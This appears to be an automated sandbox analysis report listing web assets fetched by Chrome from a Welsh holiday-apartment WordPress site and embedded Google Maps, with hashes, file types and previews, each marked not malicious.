              SHA-512:E5AE9089D0CEBE15AF43F4FD2552EE71584BC383E772836082DD0F0A9CBECAF837CB5CBBA1A4610BE42EA3412D88E4EC24600D53B8C02BE4CBD2A10639DDACE6
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4015!3i2656!4i256!2m3!1e0!2sm!3i710461649!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=6284
              Preview:RIFF*...WEBPVP8L..../..?.o.*.m%....$..Hp...^.q$.J..3... ..a.H....<....H...2..Y....N...3.0..~]..Ei..b=....}C....x8.H...@.% ..V.i..8...W&..^.kr..}...O...K//.~.....Y.o.gi.m.A.X...Z.n..........5._Z?.c[.u..?D.V.F.m..a.M.f.....?...?..................y...}...;....r....S...KUz.xZ.D.)T....u"Uh.H...E.P..E.[D..M..........."FNE.......2.wc....9...o......V....>....M.7.C..SU..H%...b.v8.%R..FK..lk ..K ..3U..n.............w..S..o.t.^.....v.m..nL....Eq4.n.f.Z..n"..y.c..@.|....4-.GH.....S..L...e.........I.[.V"...q...z....z.&.+.....Q.}/.k2U.S.....M.......@*..H...~...!..7RD(..y;...........q.Fy?...k........(..v...f....v.t$..{.....T......MQF..Q..=+...D.......\..T.xR.:.......R....j!..Is..$0.e.}.9..J-..i..Z..".HM...y.T.f..N..K.....t.....V...y.....j5|...Vf.d@.f..&g:..v..rN.+.............;..2...p.ax+.`.!.d.mg1...wZ'.aw.^5qG..9..%..=...2X.63.}..u.@6Y.p.h}.r.VU9a.-'P..|.IZ..[<.8f@..f....QE(..gn...re.&..{W..`{...l4...a..N+..7.u+.&.......$.....P3..Ok
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:PNG image data, 271 x 272, 8-bit/color RGBA, non-interlaced
              Category:downloaded
              Size (bytes):2536
              Entropy (8bit):7.320175826579447
              Encrypted:false
              SSDEEP:
              MD5:E5DAD64BD1618D01851AD32799A7E511
              SHA1:3688E4F1A5AF78B5946F6D73CAA40AA89BD3898A
              SHA-256:D9DC08A5FF0FAEBE3D94CE7715E305F54D110C00D85E2E8730986D9B7BD487DA
              SHA-512:C663DCE8000C43B5E28DD1CCDCF7578B7F98107ACA2DB2A6E70D221BFDCFEE3FB355F481B57ED1EFCF8FCF070B9FB7F1D830CEC4F0C86DE2861D747D195E40A6
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/images/icons/patterns/3.png
              Preview:.PNG........IHDR................p....tEXtSoftware.Adobe ImageReadyq.e<....iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c145 79.163499, 2018/08/13-16:40:22 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:8123eb9b-07c2-9a4c-9488-c51c15428c53" xmpMM:DocumentID="xmp.did:786BC6078F3D11EA9C5CF553CD3DD5A7" xmpMM:InstanceID="xmp.iid:786BC6068F3D11EA9C5CF553CD3DD5A7" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:8ae1fc1d-3bfc-7843-a9e2-d8ff93039b9d" stRef:documentID="adobe:docid:photoshop:2420475d-5531-7449-96d8-a2e2c41897b8"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>J.P{....IDATx.....E.....j.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):8642
              Entropy (8bit):7.9706214716830575
              Encrypted:false
              SSDEEP:
              MD5:818BC8EA97CBB37CA28A154C659C2136
              SHA1:3CA33710943C29CC5BCAE91977C611A9AF83CC59
              SHA-256:9AEC8F6BC1C7C052E86A76957EF47E2518DCD3A0430FF29405EB74F797AD7252
              SHA-512:BFACA8DD327EFDBB929A5F5B43368645DAEB64E32F92BE550677F4341B59040BCF67940A03D4002D68CD3129CCBE66287FCD9FD673E4E03C52F6C938C229CAAF
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4018!3i2657!4i256!2m3!1e0!2sm!3i710461649!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=93269
              Preview:RIFF.!..WEBPVP8L.!../..?...:.d%...Y...w.\.`..V....;H.......8.l%...G..H...'..1.......Q...5.W4..L.D...d"......,...R.O....8..t.4%...D.C.........V......7.>a...8%D.q.(!...6.Z......2...........K).....@.T.g.vm{.f...*..[.t.l.......y....!.............n...0K.....J.p?H....).k%.(r._I^K..}z../..;....>...>|.........z.'.Y.4.!.......d.z..?....../..<N.p.R.L'..v6..5J8.&*....(*I...r(.R......O..|".?...e..._...v(r..........2....J..P0.].....o....v...........V.. ....>x./g....g..W.IGRx%.....3N..Br|%.J........(.x.....E(._.o.B...o.I....K.B..Y.. ....,. +.m.....S.a..0V..D.m..R.._ p:.z..'.....^.E...D...C..%...._.W.{)N..0P..d....U1...=.".2..y.^~.O|......^..e.....P.n.>.4......y8.~.|.......u.N.?7}.1.4...4!~*....O.PD.C..>....gB..x?AH...k.!.|A.n......e8.y.OA..,2..>.s.qd&a.....Q..'.2T..A..v.d.D.0.;./.N.G..q'.p.....ft...!.l...,.x?l3..d~....hb5.!H..?C9+....;.r..t#E.E}...Q....T.?.r.......'..jH.W....O..@[...r%.I.D%....K......;}.N.%.d......."..CDE@...._3~}......|....2
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:HTML document, ASCII text, with very long lines (1779)
              Category:downloaded
              Size (bytes):2752
              Entropy (8bit):5.46895701580931
              Encrypted:false
              SSDEEP:
              MD5:BAEF3E4F3EF3EE420EAFCC3C7E24C0B9
              SHA1:21199F368D79E24261044770BE8E6081A23D8F37
              SHA-256:F42A70E56CE273CDD3E94C1BD543497413C486A851B87758F45A6FD5A6C8B398
              SHA-512:C9F99CB9404262271A6109952694C81D9498AB95D9EBD4E88B7A5474E58DA622D4D6EFFC8FA2CFBA3E6E4FD789EC7EB7434899A96D89832FF923541BDE53EAF1
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d38141.29973914133!2d-3.442856737461167!3d53.310468662938725!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x48652950cef14695%3A0x77b38c884017e5eb!2sBethel%20Chapel%20Waterfall%20Apartments!5e0!3m2!1sen!2suk!4v1683125961649!5m2!1sen!2suk
              Preview:<!DOCTYPE html>.<html>. <head>. <style type="text/css">. html, body, #mapDiv {. height: 100%;. margin: 0;. padding: 0;. }. </style>. </head>. <body>. <div id="mapDiv"></div>. . <script nonce="PSHtPzN-5YdtjsEPjwyMMA">. function onEmbedLoad() {. initEmbed([null,null,null,null,null,[[[2,"spotlit",null,null,null,null,null,[null,null,null,null,null,null,null,null,null,null,11,null,[null,null,null,null,null,null,null,null,null,null,null,null,null,1]]]],null,null,[[null,null,null,null,null,null,null,null,null,null,null,null,null,[[["5216621170424628885","8625392228163380715"],"/g/11s17p8ndk",null,[533021057,4260785921],null,null,null,null,null,null,null,null,null,null,"gcid:holiday_apartment_rental"],0,0,null,null,0,null,0]]]],null,["en","uk"],[null,null,null,"/maps/api/js/ApplicationService.GetEntityDetails","/maps/embed/upgrade204",null,"/maps/embed/record204"],null,null,null,null,null,null,null,null,"cVkbZ6f8FZOJi-gP8YnQ0Q4",nu
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Unicode text, UTF-8 text, with very long lines (65446)
              Category:dropped
              Size (bytes):269342
              Entropy (8bit):5.187062871584569
              Encrypted:false
              SSDEEP:
              MD5:2C980345711FE2DBC5191B7E89F3A077
              SHA1:06CCD0C2DA036F61D85AD9090E99964C3FD01EFA
              SHA-256:84AE9497B07A3CAA2021FA8769FBBCD4F274FB9D8C220F2F654DB8DB7A04E191
              SHA-512:84EBFE3C351154325295F4D04B28EDD022681F1623AC3F03B828F65B64089C06BB7C2AA8F353296749C29D2BF5190EEC18D5EE833386AB2DED394C58CD7A8AED
              Malicious:false
              Reputation:unknown
              Preview:/*!.FullCalendar v5.11.0.Docs & License: https://fullcalendar.io/.(c) 2021 Adam Shaw.*/.var FullCalendar=function(e){"use strict";var t=function(e,n){return(t=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(e,t){e.__proto__=t}||function(e,t){for(var n in t)Object.prototype.hasOwnProperty.call(t,n)&&(e[n]=t[n])})(e,n)};function n(e,n){if("function"!=typeof n&&null!==n)throw new TypeError("Class extends value "+String(n)+" is not a constructor or null");function r(){this.constructor=e}t(e,n),e.prototype=null===n?Object.create(n):(r.prototype=n.prototype,new r)}var r=function(){return(r=Object.assign||function(e){for(var t,n=1,r=arguments.length;n<r;n++)for(var o in t=arguments[n])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e}).apply(this,arguments)};function o(e,t,n){if(n||2===arguments.length)for(var r,o=0,i=t.length;o<i;o++)!r&&o in t||(r||(r=Array.prototype.slice.call(t,0,o)),r[o]=t[o]);return e.concat(r||t)}var i,a,s,l,u,c={},d=[],p=/acit|ex(?:s|g|n|
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text
              Category:downloaded
              Size (bytes):3679
              Entropy (8bit):4.8103504135272175
              Encrypted:false
              SSDEEP:
              MD5:9A014DDCADB83B520BD6FCE063F86FAE
              SHA1:81C9624D0DF34B8BF65DCA423AA5872DACA21DB0
              SHA-256:F6237AA5356CF154B98BCABEB745CA5FFC2BE1FFB2AA91A50646060241A6F827
              SHA-512:5CFE79DCC0E17C9C5E59EAC261E5371858B6EE11717C4D034F4946390E75870AE264FE4F1A3A6AEC1E74FB6B69EF17FC6C5ED926FAEB9B407A1163B577F173E1
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/wp-hotel-booking/includes/plugins/wp-hotel-booking-extra/assets/css/site.css?ver=2.1.1-02
              Preview:.hb_addition_package_extra {. display: none;. clear: both;. padding-top: 30px;.}...extra-option-loop .hb_addition_package_extra {. display: block;.}...extra-option-loop .hb_addition_package_extra .hb_addition_packages {. display: none;.}...hb_addition_package_extra .hb_addition_package_title_toggle {. margin: 0;.}...hb_addition_package_extra a.hb_package_toggle {. display: block;. color: #333333 !important;. font-size: 24px;. line-height: 30px;. font-weight: 700;. text-transform: none;. padding: 0;. text-decoration: none !important;. /* margin-bottom: 15px; */.}...hb_addition_package_extra a.hb_package_toggle:after {. content: '\f342';. font-family: dashicon;. font: 400 18px/1 dashicons;. vertical-align: top;. line-height: 28px;. display: inline-block;. margin-left: 5px;.}...hb_addition_package_extra a.hb_package_toggle.active:after {. content: '\f346';.}...hb_addition_package_extra .hb_package_toggle:hover,..hb_addit
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):4604
              Entropy (8bit):7.917816304703631
              Encrypted:false
              SSDEEP:
              MD5:44B3DC92C66611CE71C7DD4EFD9D7C88
              SHA1:EEAE6582AE0E3F3F964F39CEC95EEFA76836642C
              SHA-256:5A17EE80E3773563072E0632F52B46AFCD4EDE861F282737BCC778932C877F6A
              SHA-512:36FE3A5531E39B3157BBBD62E41C5925543F907BA6273F218B2C8A3318CB9D974F345C55FF293C6EE38572BA78A9C1C3A4DC743A0FBD994B6269D6EB24927C45
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4019!3i2657!4i256!2m3!1e0!2sm!3i710461637!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=12251
              Preview:RIFF....WEBPVP8L..../..?..6.mH...HD...m..$I9..N...1..H....2.7."..^.|1.........7.....}`.......=;.5Y.t......f...`.E...EF5... ...."..@...K.\Ec......H.k.. G...H@..A.$)H...I`$A..$G`...N(.....$.M......S8..P...p..I.OAMg......y.Rp.8&%...Rp.....Uf..w.*.........J...:...iCv....*..kp..j+.9.v.H...%]H.Q{f....$..av....8.,..6...w*...j..?.H.Y2`........7.....,...w-...........%=.R....%]H......,...;...._..`I...<.F..:..:.......%.~.\.Drz.3...b...w$B.B..L3.7Si..D._..aI`....J.j+...jI$...\...j=.mL.S".F.i.rJ4?.*8K..2...rJ.SN+.6.....K..7.X.t.k{.S.qnV.6..,..JFI(Z.H`...9.l...*xK...ii.|....z...<..K...S.X.....J....Q.....DHK(m,...z...9..{..;..._..4..._.-a.b...Z-.m.......A}R.X.!..&...:..[N..F.......V.O....I@ic.!..f..sB.S"K..&...d..R#..X.v(}....H..._..._.)..s.1`p...k.(...m..Z.....i.i...L..`.=H.Y.C.......i....\.$=.H_.V.}..|......%]H=p*...b.*.(.t.....rj...w..M.*.ygI...._(.wAyX.y.A.......0@.gI....;...../.Rp..Pk..)m......\.O.<,..V....r.X........%.O.LmC.J.]j|Ai..)8Kz..X...k
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):4379
              Entropy (8bit):4.123842643258953
              Encrypted:false
              SSDEEP:
              MD5:5A457D262E3C32D25C003CA412EE7FE6
              SHA1:B08E23C986259073419A7068FCD36296A91B1AE4
              SHA-256:46FB2235BCF84086A9B939AE509ECACC01BB31C68BA94E6473E31D8ADEBEC3EB
              SHA-512:826945D028EFC7A9F95C22C5F4D34DFAB6704B75F45E7D6FC2E93E2B42F7078AAF7B8508F9155B36DD15CA759A765FFF3B4550F17E3B187E79285F63DE455D53
              Malicious:false
              Reputation:unknown
              Preview:/*.. * jQuery.appear.. * https://github.com/bas2k/jquery.appear/.. * http://code.google.com/p/jquery-appear/.. * http://bas2k.ru/.. *.. * Copyright (c) 2009 Michael Hixson.. * Copyright (c) 2012-2014 Alexander Brovikov.. * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php).. */..(function($) {.. $.fn.appear = function(fn, options) {.... var settings = $.extend({.... //arbitrary data to pass to fn.. data: undefined,.... //call fn only on the first appear?.. one: true,.... // X & Y accuracy.. accX: 0,.. accY: 0.... }, options);.... return this.each(function() {.... var t = $(this);.... //whether the element is currently visible.. t.appeared = false;.... if (!fn) {.... //trigger the custom event.. t.trigger('appear', settings.data);.. return;.. }....
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, comment: "CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82", baseline, precision 8, 2560x1437, components 3
              Category:dropped
              Size (bytes):409506
              Entropy (8bit):7.966036071666668
              Encrypted:false
              SSDEEP:
              MD5:F79AB36C2D58DB1FF9D3C5B48E70ECD1
              SHA1:1C9AA15F069EDFEF7FDAADFD2AA8EB80C46D286A
              SHA-256:C59E9F9A93FB5A4EC67ED5B519E59155FA7103CB6223693BB599CCF76D1DA6FE
              SHA-512:3167153CF4D347A23D8CA81A415336D5016A243B040EA57129AE6412F0A6BB066CCC31B620FCCB72890FCDF6D9B61B9296CCB0299179E49002446D1F37AE71FE
              Malicious:false
              Reputation:unknown
              Preview:......JFIF.....`.`.....;CREATOR: gd-jpeg v1.0 (using IJG JPEG v62), quality = 82....C.....................................!........'.."#%%%..),($+!$%$...C...........$...$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......]e..W..7.....Y..$..+..wD..o.....]....5.F.+G..R.....^+.J;..z\....'.,.z..G....n-....(....1E-.%.(...QE-..QI.Z@...Q@.(......u...Q.Z.LR..P.R.(....P.R..H..'.)).P.iqK.(....;....QN.. ......BQ.\Q@..N.&(....?....qE;..P..1F)h.:.c..1..a..M.J*.!.)...:.SE8P..p..p..T........+ak...4^....`S`..).).c...)..N...L
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:RIFF (little-endian) data, Web/P image
              Category:downloaded
              Size (bytes):7492
              Entropy (8bit):7.968165643388029
              Encrypted:false
              SSDEEP:
              MD5:1E349531BC5A2170DBF60DDD16C0EE31
              SHA1:7C3A9DB5E204BCF6AA0D113487754EA44F822471
              SHA-256:DC49EE7D345E35BC74C284549FA72F0429CC1B068D32B2CEF5710DDDCE880481
              SHA-512:C0068867F866FB6C4D09E5B118CEF0EF714253055A7DA6226EE9EABD314A8F1BD504982296F65783412D60F819091E3DA609FB288D1C4E523658D897340414FF
              Malicious:false
              Reputation:unknown
              URL:https://www.google.com/maps/vt?pb=!1m5!1m4!1i13!2i4019!3i2655!4i256!2m3!1e0!2sm!3i710461637!2m3!1e2!2sspotlit!5i1!3m12!2sen!3sGB!5e289!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!4e0!5m1!1e3!23i47083502!27m15!299174093m14!14m13!1m8!1m2!1y5216621170424628885!2y8625392228163380715!2s%2Fg%2F11s17p8ndk!4m2!1x533021057!2x4260785921!15sgcid%3Aholiday_apartment_rental!2b0!3b0!6b0!8b0&client=google-maps-embed&token=106158
              Preview:RIFF<...WEBPVP8L0.../..?...6..&H!....i...{.%.6.F...e......4Z[.a..md.J...#!)...G.....?..fA..7Q.{v..*..Qn./Z.R1.U).Z........P............%.s..~.....'bl=Br.DI....7.....O5P.7..t.V.{k.:.........m.?).o..%....B.}.KP.PT...N.......a...............n`........H....../.i.x...sMQ.H.3..F.9...L.mf.\s..K....c...9.,&!4.3.9.H...5...g^....2.Y.m.q.9.$!..o.e.3N....7.......r..0...3........E........ .....%f.WH.BA...:...r\I..H..R..M6K.c..".g.O.G`2E.B<h.6.WR.8.....W..4.}..*...}`...;.......7.....b...?`."b.b.n...u&...1.%1..g..xB.........dJ.F...FD.9Q@T(&eM..K,.|LD4%I.D&,R..U.....|...NZd.%D].\\..7.........W=....t...=B...X..r-.y.]t....o..=...DT.F.=....{@...{.)....N....Q..vs....u..f3[.}..w...o..D.A.?.o/.{...*...........$.....K..7.}...H..\..am.VsB.33c._..]...x.no.^..\...UA....-V.^....].7]K. [~u.F..-.......e".g&...W+...h..2..-}..Y....hq..W.n.A.e}.,w..d.do.-.).J.H..F.z7.6......2.^[.....o.a......>..,..N.....e......D.E.W.{}.@.X..-}..x...rF...2..2 .....M!.]L\>.Bj...nA...e.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:Unicode text, UTF-8 text, with very long lines (7588)
              Category:downloaded
              Size (bytes):8226
              Entropy (8bit):5.76204324691084
              Encrypted:false
              SSDEEP:
              MD5:B3717C29CB0ADFC071804D218B57BEBD
              SHA1:28BBFE998436CD77A63A11370AD89837F34DF687
              SHA-256:F79213E5272412250A828C532A075725890C53F76E35FA5516052117D3FEC6D7
              SHA-512:70374BA943D6BB841052B393F15E4D5D88EAC8577E3A54FB92C67FE72C6E87DAF571B597849140631BEF97F2783A8CDE5B7936FEAF5C30789717206768203B31
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-includes/js/dist/url.min.js?ver=36ae0e4dd9043bb8749b
              Preview:/*! This file is auto-generated */.(()=>{var e={9681:e=>{var t={.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"AE",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"A",.:"C",.:"C",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"E",.:"I",.:"I",.:"I",.:"I",.:"I",.:"I",.:"I",.:"I",.:"D",.:"N",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"O",.:"U",.:"U",.:"U",.:"U",.:"U",.:"U",.:"U",.:"U",.:"U",.:"Y",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"ae",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"a",.:"c",.:"c",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"e",.:"i",.:"i",.:"i",.:"i",.:"i",.:"i",.:"i",.
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (29766), with no line terminators
              Category:downloaded
              Size (bytes):29766
              Entropy (8bit):4.773458210467861
              Encrypted:false
              SSDEEP:
              MD5:C9ABD650CC8D7DC89D6B51CEF910E073
              SHA1:293FC758FB4A690F57DD8FBB814CBE14E3FD2AD1
              SHA-256:E8360D858E1A50807BDCDD8688D9A05567B5088FFF561807873A6E4242415CA2
              SHA-512:016EF6912920DC40CF419ECDAED24353F9408191327D3E19E01041F7463A6A7DE0D9435DF6E43EB67BD6C1FDD5BD8DF0C430FAA3CC9338854A3F0DB9E06ECAD0
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/foobox-image-lightbox/free/css/foobox.free.min.css?ver=2.7.32
              Preview:.fbx-modal,.fbx-modal *{box-sizing:content-box}.fbx-modal{position:fixed;top:0;left:0;z-index:9000001;visibility:hidden;width:100%;height:100%;font-family:"Segoe UI",Helvetica,Arial,"Sans Serif",serif;line-height:normal;outline:0!important;transform:translate3d(0,0,0);perspective:0}.fbx-modal.fbx-loading,.fbx-modal.fbx-show{visibility:visible}.fbx-no-scroll{overflow:hidden!important}.fbx-inner-spacer{display:none;padding:40px}.fbx-inner{position:absolute;top:50%;left:50%;visibility:hidden;overflow:visible!important;margin-top:-5px;margin-left:-5px;min-width:100px;min-height:100px;width:100px;height:100px;z-index:100002}.fbx-show .fbx-inner{visibility:visible}.fbx-loader{position:absolute;top:50%;left:50%;visibility:hidden;z-index:100005;width:80px;height:80px;font-size:16px;transform:translateX(-50%) translateY(-50%)}.fbx-loader .fbx-icon{width:48px;height:48px;margin-top:-24px;margin-left:-24px;transform:none}.fbx-loading .fbx-loader{visibility:visible}.fbx-loading .fbx-loader .fbx-ic
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:assembler source, ASCII text, with CRLF line terminators
              Category:downloaded
              Size (bytes):191968
              Entropy (8bit):5.118599838932822
              Encrypted:false
              SSDEEP:
              MD5:D67DF2D0DEB7D4FFF84C61F319500241
              SHA1:6E6EB7EA4BDB3E927E8033FEFEEA7052D279B09B
              SHA-256:E21E6511F4A0839B64E617F591821D82F4464EDDFBF2A0A7A4B63AA35006A341
              SHA-512:78303E2537B3AEF41102CC257864D54CC7BEFE4D498DE5412061671FAB1DAA89A2B292ED7C151A35763960D751ECC64644E8A772962571F4D952F95E37B1A121
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/style.css?ver=1726496070
              Preview:/* Hotera - Hotel and Restaurant HTML Template */..../*** ....====================================================================.....Fonts..====================================================================.... ***/..../*...font-family: 'Roboto', sans-serif;...font-family: 'Yeseva One', cursive;..*/../*** ....====================================================================...Reset..====================================================================.... ***/....*{...margin:0px;...padding:0px;...border:none;...outline:none;...font-size: 100%;...line-height: inherit;..}..../*** ....====================================================================...Global Settings..====================================================================.... ***/....body {......font-size:16px;...color:#1b1c1e;...line-height:1.5em;...font-weight:400;...background:#ffffff;...-webkit-font-smoothing: antialiased;...-moz-font-smoothing: antialiased;...font-family: 'Roboto', sans-serif;..}....a{...text-
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (65496)
              Category:downloaded
              Size (bytes):163796
              Entropy (8bit):4.682221449171746
              Encrypted:false
              SSDEEP:
              MD5:F173AD68F2FEEFC79F3041E986096767
              SHA1:BF8F596169B24B54B520F4B9D319FA520D3AD098
              SHA-256:43A41EA21464083F872045D1439E0DFFA12839720DE52890F9261EFA11EB8BAA
              SHA-512:4D0BB6CEDE88DBD19FE0EB7F857948173ABA0B548C07940F7418BF138172BD89ADC9E6186FCF547372C272AB11C1D252833259FCABED87253830F937F7D0822F
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/elementor/assets/css/frontend.min.css?ver=3.15.3
              Preview:/*! elementor - v3.15.0 - 20-08-2023 */.@charset "UTF-8";.dialog-widget-content{background-color:var(--e-a-bg-default);position:absolute;border-radius:3px;box-shadow:2px 8px 23px 3px rgba(0,0,0,.2);overflow:hidden}.dialog-message{line-height:1.5;box-sizing:border-box}.dialog-close-button{cursor:pointer;position:absolute;margin-top:15px;right:15px;color:var(--e-a-color-txt);font-size:15px;line-height:1;transition:var(--e-a-transition-hover)}.dialog-close-button:hover{color:var(--e-a-color-txt-hover)}.dialog-prevent-scroll{overflow:hidden;max-height:100vh}.dialog-type-lightbox{position:fixed;height:100%;width:100%;bottom:0;left:0;background-color:rgba(0,0,0,.8);z-index:9999;-webkit-user-select:none;-moz-user-select:none;user-select:none}.elementor-editor-active .elementor-popup-modal{background-color:initial}.dialog-type-alert .dialog-widget-content,.dialog-type-confirm .dialog-widget-content{margin:auto;width:400px;padding:20px}.dialog-type-alert .dialog-header,.dialog-type-confirm .dia
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with CRLF line terminators
              Category:downloaded
              Size (bytes):132601
              Entropy (8bit):4.967653967357031
              Encrypted:false
              SSDEEP:
              MD5:8CAF7B60470C36C1F1F4038EED4AF6EF
              SHA1:52BBFE22F9EB161156EB0C71362D75968153A903
              SHA-256:2CCBBEA25B06596A234BCB2FF5B95B8A72FE806EC160E8390776FE71F5CBEC30
              SHA-512:1C26E936469CCADA70F028BC45D1128E531131928CAB5BC37172A1B76C8E951ABFBD29BEBF2A1D485032C56828A667E3F5DD38AB7D51CBD568002B13388A1D88
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/themes/hotera/assets/css/hover.css?ver=1726496070
              Preview:/*!.. * Hover.css (http://ianlunn.github.io/Hover/).. * Version: 2.0.2.. * Author: Ian Lunn @IanLunn.. * Author URL: http://ianlunn.co.uk/.. * Github: https://github.com/IanLunn/Hover.... * Made available under a MIT License:.. * http://www.opensource.org/licenses/mit-license.php.... * Hover.css Copyright Ian Lunn 2014. Generated with Sass... */../* 2D TRANSITIONS */../* Grow */...hvr-grow {.. display: inline-block;.. vertical-align: middle;.. -webkit-transform: translateZ(0);.. transform: translateZ(0);.. box-shadow: 0 0 1px rgba(0, 0, 0, 0);.. -webkit-backface-visibility: hidden;.. backface-visibility: hidden;.. -moz-osx-font-smoothing: grayscale;.. -webkit-transition-duration: 0.3s;.. transition-duration: 0.3s;.. -webkit-transition-property: transform;.. transition-property: transform;..}...hvr-grow:hover, .hvr-grow:focus, .hvr-grow:active {.. -webkit-transform: scale(1.1);.. transform: scale(1.1);..}..../* Shrink */...hvr-shrink {.. display: inline-block;.. vertical
              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
              File Type:ASCII text, with very long lines (19442)
              Category:downloaded
              Size (bytes):19488
              Entropy (8bit):4.558567693781949
              Encrypted:false
              SSDEEP:
              MD5:56435E46ABD5F7A20DD5B8590FBDC083
              SHA1:FAB2A319DC679ED90D62AF44F9E37625A0562958
              SHA-256:8631189CA38E73206E52ED06E8F0F3B2E839B9FACC236B9519B9FD8D7F8D63E2
              SHA-512:6173ABE44B1AD586108395AF2534997C7EBD06A59E571EFF155C70AAB5692B309AE4D6F3D13496D5A583013C96FC7B0A29472D3D7D8054325007298FC80DD6AF
              Malicious:false
              Reputation:unknown
              URL:https://dyserthwaterfalls.co.uk/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ver=5.21.0
